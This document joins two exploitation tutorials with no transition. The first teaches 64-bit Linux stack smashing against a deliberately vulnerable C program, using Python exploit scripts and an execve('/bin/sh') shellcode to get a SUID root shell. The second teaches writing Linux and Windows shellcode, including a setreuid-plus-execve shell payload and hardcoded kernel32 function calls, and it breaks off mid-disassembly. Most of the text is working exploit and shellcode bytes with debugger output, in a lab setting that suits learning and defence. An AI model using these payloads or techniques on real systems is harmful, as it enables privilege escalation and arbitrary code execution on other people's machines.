This series of tutorials is intended as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and want to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.


Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • The highest canonical user-space address is 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.
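The canonical address point is the one that tends to trip people up, so here is a minimal Python 3 check for it. It assumes the usual 48-bit virtual addressing, where bits 47 through 63 of an address must all be the same; is_canonical() is my own helper name.

```python
def is_canonical(addr):
    """True if bits 63..47 are all zeros or all ones (48-bit addressing)."""
    top = (addr & 0xFFFFFFFFFFFFFFFF) >> 47   # the upper 17 bits
    return top == 0 or top == 0x1FFFF


for addr in (0x00007FFFFFFFFFFF,    # highest user-space address
             0x0000414141414141,    # six "A"s with the top two bytes zeroed
             0x4141414141414141):   # eight "A"s
    print(hex(addr), is_canonical(addr))
```

An address made of eight “A” bytes fails the check, while one with the top two bytes zeroed passes, which matters once we start overwriting the saved return address.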

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function, because read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload, right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)
f.close()

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact, we don’t control RIP at all. Recall from earlier that the highest canonical user-space address is 0x00007FFFFFFFFFFF. The ret instruction tried to load the non-canonical address 0x4141414141414141 into RIP, which causes the processor to raise an exception while RIP is still pointing at the ret. In order to control RIP, we need to overwrite it with a canonical address such as 0x0000414141414141 instead. So really the goal is to find the offset at which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104
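
As an aside, here is roughly how an offset lookup like this works, sketched in Python 3. The generator below builds an "Aa0Aa1Aa2..." style pattern, which is NOT the pattern PEDA produces, so its offsets only make sense together with its own pattern. The function names are made up for this illustration.

```python
import string
import struct

def cyclic_pattern(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern in which every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(pattern: bytes, value: int) -> int:
    """Find where a 32-bit little-endian value read from memory occurs in the pattern."""
    return pattern.find(struct.pack("<I", value))

pattern = cyclic_pattern(400)
# Pretend these four bytes were read from the top of the stack with x/wx $rsp.
leaked = struct.unpack("<I", pattern[104:108])[0]
print(pattern_offset(pattern, leaked))
```

The value is packed as little-endian before searching because that is how the four pattern bytes end up in a register or memory word on x86.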

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*288                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)
f.close()

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
Invalid $PC address: 0x424242424242
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)
f.close()

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
No shell for you :(

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Shellcoding for Linux and Windows Tutorial

WARNING: The following text is useful as a historical and basic document on writing shellcodes.

Background Information

  • EAX, EBX, ECX, and EDX are all 32-bit General Purpose Registers (GPRs) on the x86 platform.
  • AH, BH, CH, and DH access bits 8 through 15 of the GPRs (the high byte of AX, BX, CX, and DX).
  • AL, BL, CL, and DL access the lower 8 bits of the GPRs.
  • ESI and EDI carry the fourth and fifth arguments when making Linux syscalls.
  • Linux syscalls with 6 arguments or fewer take their arguments in registers.
  • XOR EAX, EAX is a great way to zero out a register (while staying away from the nefarious NULL byte!)
  • In 32-bit Windows, Win32 API function arguments are passed on the stack (the stdcall calling convention).
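
The relationship between a 32-bit register and its 16-bit and 8-bit views can be illustrated with plain bit masks. This Python 3 sketch only models the arithmetic; the function name sub_registers is made up for this illustration.

```python
def sub_registers(eax: int) -> dict:
    """Split a 32-bit EAX value into the AX, AH, and AL views."""
    eax &= 0xFFFFFFFF
    return {
        "EAX": eax,
        "AX": eax & 0xFFFF,        # low 16 bits
        "AH": (eax >> 8) & 0xFF,   # bits 8..15
        "AL": eax & 0xFF,          # low 8 bits
    }

for name, value in sub_registers(0x11223344).items():
    print(f"{name} = {value:#x}")
```

Writing to AL therefore changes only the lowest byte, which is why the shellcode in this tutorial zeroes the full register first and then loads small constants through AL.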


Required Tools

  • gcc
  • ld
  • nasm
  • objdump


Optional Tools

  • odfhex.c: a utility created by me to extract the shellcode from "objdump -d" and turn it into escaped hex code (very useful!).
  • arwin.c: a utility created by me to find the absolute addresses of Windows functions within a specified DLL.
  • shellcodetest.c: this is just a copy of the C code found below. It is a small skeleton program to test shellcode.
  • exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm: the source code found in this document (the win32 shellcode was written with Windows XP SP1).

Linux Shellcoding

When testing shellcode, it is nice to just plop it into a program and let it run. The C program below will be used to test all of our code.


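char code[] = "bytecode will go here!";
int main(int argc, char **argv)
{
  int (*func)();              /* pointer to a function returning int */
  func = (int (*)()) code;    /* treat the byte array as code */
  return func();              /* jump to the shellcode */
}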


Making a Quick Exit

    The easiest way to begin would be to demonstrate the exit syscall due to its simplicity. Here is some simple asm code to call exit. Notice the al and XOR trick to ensure that no NULL bytes will get into our code.

[SECTION .text]
global _start
_start:
        xor eax, eax    ;zero out eax
        mov al, 1       ;exit is syscall 1
        xor ebx,ebx     ;zero out ebx
        int 0x80
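
To see why the NULL byte matters, it helps to compare the machine code of the obvious instruction with the XOR-and-AL version. The Python 3 sketch below uses hand-assembled IA-32 encodings; the helper names are made up for this illustration.

```python
# Two ways to load the value 1 into EAX, as raw IA-32 machine code.
MOV_EAX_1 = bytes([0xB8, 0x01, 0x00, 0x00, 0x00])   # mov eax, 1
XOR_THEN_MOV_AL = bytes([0x31, 0xC0, 0xB0, 0x01])   # xor eax, eax ; mov al, 1

def has_null(code: bytes) -> bool:
    """True if the machine code contains a 0x00 byte."""
    return b"\x00" in code

def c_strlen(code: bytes) -> int:
    """Number of bytes a C string function such as strcpy() would copy."""
    return code.index(0) if 0 in code else len(code)

for name, code in (("mov eax, 1", MOV_EAX_1), ("xor/mov al", XOR_THEN_MOV_AL)):
    print(name, has_null(code), c_strlen(code))
```

The 32-bit immediate in mov eax, 1 drags three zero bytes along with it, so a string copy would cut the shellcode off after two bytes. The second form is one byte shorter and survives intact.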

Take the following steps to compile and extract the byte code.
steve hanna@1337b0x:~$ nasm -f elf exit.asm
steve hanna@1337b0x:~$ ld -o exiter exit.o
steve hanna@1337b0x:~$ objdump -d exiter

exiter:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       b0 01                   mov    $0x1,%al
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       cd 80                   int    $0x80

The bytes we need are b0 01 31 db cd 80.

Replace the code at the top with:
char code[] = "\xb0\x01\x31\xdb\xcd\x80";

Now, run the program. We have a successful piece of shellcode! One can strace the program to ensure that it is calling exit.
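
Copying bytes out of objdump output by hand gets error-prone as the shellcode grows. The Python 3 sketch below shows one way to automate it. It is not the odfhex.c utility mentioned earlier, just a rough equivalent, and it assumes the usual "address: byte byte ... mnemonic" line layout; the function name is made up for this illustration.

```python
import re

# Matches the "address:" prefix followed by one or more "xx " byte columns.
LINE_RE = re.compile(r"^\s*[0-9a-f]+:\s+((?:[0-9a-f]{2} )+)")

def objdump_to_c_string(listing: str) -> str:
    """Turn the byte columns of an objdump -d listing into \\xNN escapes."""
    escaped = []
    for line in listing.splitlines():
        match = LINE_RE.match(line)
        if match:
            escaped += ["\\x" + byte for byte in match.group(1).split()]
    return "".join(escaped)

sample = """\
08048080 <_start>:
 8048080:       b0 01                   mov    $0x1,%al
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       cd 80                   int    $0x80
"""
print('char code[] = "%s";' % objdump_to_c_string(sample))
```

Header lines such as the symbol name or the file format line do not match the pattern and are skipped.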

Saying Hello

For this next piece, let’s ease our way into something useful. In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime. This is important because while running shellcode in an unknown environment, the address of the string will be unknown because the program is not running in its normal address space.

[SECTION .text]

global _start

_start:
        jmp short ender

starter:
        xor eax, eax    ;clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx

        mov al, 4       ;syscall write
        mov bl, 1       ;stdout is 1
        pop ecx         ;get the address of the string from the stack
        mov dl, 5       ;length of the string
        int 0x80

        xor eax, eax
        mov al, 1       ;exit the shellcode
        xor ebx,ebx
        int 0x80

ender:
        call starter    ;put the address of the string on the stack
        db 'hello'


steve hanna@1337b0x:~$ nasm -f elf hello.asm
steve hanna@1337b0x:~$ ld -o hello hello.o
steve hanna@1337b0x:~$ objdump -d hello

hello:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 19                   jmp    804809b <ender>

08048082 <starter>:
 8048082:       31 c0                   xor    %eax,%eax
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       31 c9                   xor    %ecx,%ecx
 804808a:       b0 04                   mov    $0x4,%al
 804808c:       b3 01                   mov    $0x1,%bl
 804808e:       59                      pop    %ecx
 804808f:       b2 05                   mov    $0x5,%dl
 8048091:       cd 80                   int    $0x80
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       b0 01                   mov    $0x1,%al
 8048097:       31 db                   xor    %ebx,%ebx
 8048099:       cd 80                   int    $0x80

0804809b <ender>:
 804809b:       e8 e2 ff ff ff          call   8048082 <starter>
 80480a0:       68 65 6c 6c 6f          push   $0x6f6c6c65
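
The jmp/call/pop trick works because both instructions are relative and because call pushes the address of whatever follows it. The Python 3 sketch below decodes the two instructions from the listing above to show where they land and what gets pushed. The function names are made up for this illustration.

```python
import struct

def jmp_short_target(addr: int, code: bytes) -> int:
    """Target of an 'eb rel8' instruction located at addr."""
    (rel,) = struct.unpack("<b", code[1:2])
    return addr + 2 + rel            # relative to the end of the 2-byte jmp

def call_near(addr: int, code: bytes):
    """Return (target, pushed_return_address) for 'e8 rel32' located at addr."""
    (rel,) = struct.unpack("<i", code[1:5])
    return_address = addr + 5        # address of the byte after the call
    return return_address + rel, return_address

print(hex(jmp_short_target(0x8048080, bytes.fromhex("eb19"))))
target, pushed = call_near(0x804809B, bytes.fromhex("e8e2ffffff"))
print(hex(target), hex(pushed))
```

The pushed return address is 0x80480a0, which is exactly where the bytes 68 65 6c 6c 6f ("hello") sit, so the pop ecx in starter picks up the string's address no matter where the shellcode is loaded. objdump shows those bytes as a push instruction only because it cannot tell data from code.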

Replace the code at the top with:
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd"\
              "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f";

At this point we have a fully functional piece of shellcode that outputs to stdout.
Now that dynamic string addressing has been demonstrated as well as the ability to zero
out registers, we can move on to a piece of code that gets us a shell.

Spawning a Shell

    This code combines what we have been doing so far. This code attempts to set root privileges if they are dropped and then spawns a shell. Note: system("/bin/sh") would have been a lot simpler, right? Well, the only problem with that approach is that system() runs the command through /bin/sh, which typically drops elevated privileges.

Remember when reading this code:
    int execve(const char *filename, char *const argv[], char *const envp[]);

So, the last two arguments expect pointers to pointers. That’s why I store the address of the "/bin/sh" string in memory right after the string and then pass the address of that memory to the function. When the pointers are dereferenced, the target memory will be the "/bin/sh" string.

[SECTION .text]

global _start

_start:
        xor eax, eax
        mov al, 70              ;setreuid is syscall 70
        xor ebx, ebx
        xor ecx, ecx
        int 0x80

        jmp short ender

starter:
        pop ebx                 ;get the address of the string
        xor eax, eax

        mov [ebx+7 ], al        ;put a NULL where the N is in the string
        mov [ebx+8 ], ebx       ;put the address of the string to where the
                                ;AAAA is
        mov [ebx+12], eax       ;put 4 null bytes into where the BBBB is
        mov al, 11              ;execve is syscall 11
        lea ecx, [ebx+8]        ;load the address of where the AAAA was
        lea edx, [ebx+12]       ;load the address of the NULLS
        int 0x80                ;call the kernel, WE HAVE A SHELL!

ender:
        call starter
        db '/bin/shNAAAABBBB'
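
The three stores into the string are easier to follow when simulated on a copy of the 16-byte block. The Python 3 sketch below applies them to a byte array. The base address is only an example value (the address at which the string appears in the objdump listing in this section), and the function name is made up for this illustration.

```python
import struct

def patch_execve_block(base: int, block: bytes) -> bytes:
    """Apply the three stores from the shellcode to a copy of the string block."""
    mem = bytearray(block)
    mem[7] = 0                              # mov [ebx+7], al   (terminate "/bin/sh")
    mem[8:12] = struct.pack("<I", base)     # mov [ebx+8], ebx  (argv[0] = &"/bin/sh")
    mem[12:16] = struct.pack("<I", 0)       # mov [ebx+12], eax (argv[1] = NULL)
    return bytes(mem)

base = 0x080480A7   # example address of the string, taken from the listing
mem = patch_execve_block(base, b"/bin/shNAAAABBBB")
filename = mem[:mem.index(0)]
argv0, argv1 = struct.unpack("<II", mem[8:16])
print(filename, hex(argv0), argv1)
```

After the patching, EBX points at the NULL-terminated filename, ECX (base + 8) points at a two-entry argv array, and EDX (base + 12) points at a NULL that serves as an empty envp.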

steve hanna@1337b0x:~$ nasm -f elf shellex.asm
steve hanna@1337b0x:~$ ld -o shellex shellex.o
steve hanna@1337b0x:~$ objdump -d shellex

shellex:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       b0 46                   mov    $0x46,%al
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 c9                   xor    %ecx,%ecx
 8048088:       cd 80                   int    $0x80
 804808a:       eb 16                   jmp    80480a2 <ender>

0804808c <starter>:
 804808c:       5b                      pop    %ebx
 804808d:       31 c0                   xor    %eax,%eax
 804808f:       88 43 07                mov    %al,0x7(%ebx)
 8048092:       89 5b 08                mov    %ebx,0x8(%ebx)
 8048095:       89 43 0c                mov    %eax,0xc(%ebx)
 8048098:       b0 0b                   mov    $0xb,%al
 804809a:       8d 4b 08                lea    0x8(%ebx),%ecx
 804809d:       8d 53 0c                lea    0xc(%ebx),%edx
 80480a0:       cd 80                   int    $0x80

080480a2 <ender>:
 80480a2:       e8 e5 ff ff ff          call   804808c <starter>
 80480a7:       2f                      das
 80480a8:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80480ab:       2f                      das
 80480ac:       73 68                   jae    8048116 <ender+0x74>
 80480ae:       58                      pop    %eax
 80480af:       41                      inc    %ecx
 80480b0:       41                      inc    %ecx
 80480b1:       41                      inc    %ecx
 80480b2:       41                      inc    %ecx
 80480b3:       42                      inc    %edx
 80480b4:       42                      inc    %edx
 80480b5:       42                      inc    %edx
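 80480b6:       42                      inc    %edx

Replace the code at the top with:

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";

This code produces a fully functional shell when injected into an exploit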
and demonstrates most of the skills needed to write successful shellcode. Be
aware though, the better one is at assembly, the more functional, robust,
and most of all evil, one's code will be.

Windows Shellcoding

Sleep is for the Weak!

    In order to write successful code, we first need to decide what functions we wish to use for this shellcode and then find their absolute addresses. For this example we just want a thread to sleep for an allotted amount of time. Let’s load up arwin (found above) and get started. Remember, the only module guaranteed to be mapped into the process’s address space is kernel32.dll. So for this example, Sleep seems to be the simplest function, accepting the amount of time the thread should suspend as its only argument.

G:\> arwin kernel32.dll Sleep
arwin - win32 address resolution program - by steve hanna - v.01
Sleep is located at 0x77e61bea in kernel32.dll

[SECTION .text]

global _start

_start:
        xor eax,eax
        mov ebx, 0x77e61bea ;address of Sleep
        mov ax, 5000        ;pause for 5000ms
        push eax
        call ebx        ;Sleep(ms);

steve hanna@1337b0x:~$ nasm -f elf sleep.asm; ld -o sleep sleep.o; objdump -d sleep
sleep:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       bb ea 1b e6 77          mov    $0x77e61bea,%ebx
 8048087:       66 b8 88 13             mov    $0x1388,%ax
 804808b:       50                      push   %eax
 804808c:       ff d3                   call   *%ebx

Replace the code at the top with:
char code[] = "\x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3";

When this code is inserted it will cause the parent thread to suspend for five seconds (note: it will then probably crash because the stack is smashed at this point :-D).


A Message to say «Hey»

    This second example is useful in that it shows a shellcoder how to do several things within the bounds of Windows shellcoding. Although this example does nothing more than pop up a message box and say "hey", it demonstrates absolute addressing as well as dynamic addressing using LoadLibrary and GetProcAddress. The library functions we will be using are LoadLibraryA, GetProcAddress, MessageBoxA, and ExitProcess (note: the A after the function name specifies we will be using a normal character set, as opposed to a W, which would signify a wide character set such as Unicode). Let’s load up arwin and find the addresses we need to use. We will not retrieve the address of MessageBoxA at this time; we will dynamically load that address.

G:\>arwin kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x77e7d961 in kernel32.dll

G:\>arwin kernel32.dll GetProcAddress
arwin - win32 address resolution program - by steve hanna - v.01
GetProcAddress is located at 0x77e7b332 in kernel32.dll

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

[SECTION .text]

global _start

_start:
	;eax holds return value
	;ebx will hold function addresses
	;ecx will hold string pointers
	;edx will hold NULL

	xor eax,eax
	xor ebx,ebx			;zero out the registers
	xor ecx,ecx
	xor edx,edx

	jmp short GetLibrary
LibraryReturn:
	pop ecx				;get the library string
	mov [ecx + 10], dl		;insert NULL
	mov ebx, 0x77e7d961		;LoadLibraryA(libraryname);
	push ecx			;beginning of user32.dll
	call ebx			;eax will hold the module handle

	jmp short FunctionName
FunctionReturn:
	pop ecx				;get the address of the Function string
	xor edx,edx
	mov [ecx + 11],dl		;insert NULL
	push ecx
	push eax
	mov ebx, 0x77e7b332		;GetProcAddress(hmodule,functionname);
	call ebx			;eax now holds the address of MessageBoxA

	jmp short Message
MessageReturn:
	pop ecx				;get the message string
	xor edx,edx
	mov [ecx+3],dl			;insert the NULL

	xor edx,edx
	push edx			;MB_OK
	push ecx			;title
	push ecx			;message
	push edx			;NULL window handle
	call eax			;MessageBoxA(windowhandle,msg,title,type);

	xor edx,edx
	push eax
	mov eax, 0x77e798fd 		;exitprocess(exitcode);
	call eax			;exit cleanly so we don't crash the parent program

	;the N at the end of each string signifies the location of the NULL
	;character that needs to be inserted
GetLibrary:
	call LibraryReturn
	db 'user32.dllN'
FunctionName:
	call FunctionReturn
	db 'MessageBoxAN'
Message:
	call MessageReturn
	db 'HeyN'

[steve hanna@1337b0x]$ nasm -f elf msgbox.asm; ld -o msgbox msgbox.o; objdump -d msgbox

msgbox:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       31 c9                   xor    %ecx,%ecx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       eb 37                   jmp    80480c1 <GetLibrary>

0804808a <LibraryReturn>:
 804808a:       59                      pop    %ecx
 804808b:       88 51 0a                mov    %dl,0xa(%ecx)
 804808e:       bb 61 d9 e7 77          mov    $0x77e7d961,%ebx
 8048093:       51                      push   %ecx
 8048094:       ff d3                   call   *%ebx
 8048096:       eb 39                   jmp    80480d1 <FunctionName>

08048098 <FunctionReturn>:
 8048098:       59                      pop    %ecx
 8048099:       31 d2                   xor    %edx,%edx
 804809b:       88 51 0b                mov    %dl,0xb(%ecx)
 804809e:       51                      push   %ecx
 804809f:       50                      push   %eax
 80480a0:       bb 32 b3 e7 77          mov    $0x77e7b332,%ebx
 80480a5:       ff d3                   call   *%ebx
 80480a7:       eb 39                   jmp    80480e2 <Message>

080480a9 <MessageReturn>:
 80480a9:       59                      pop    %ecx
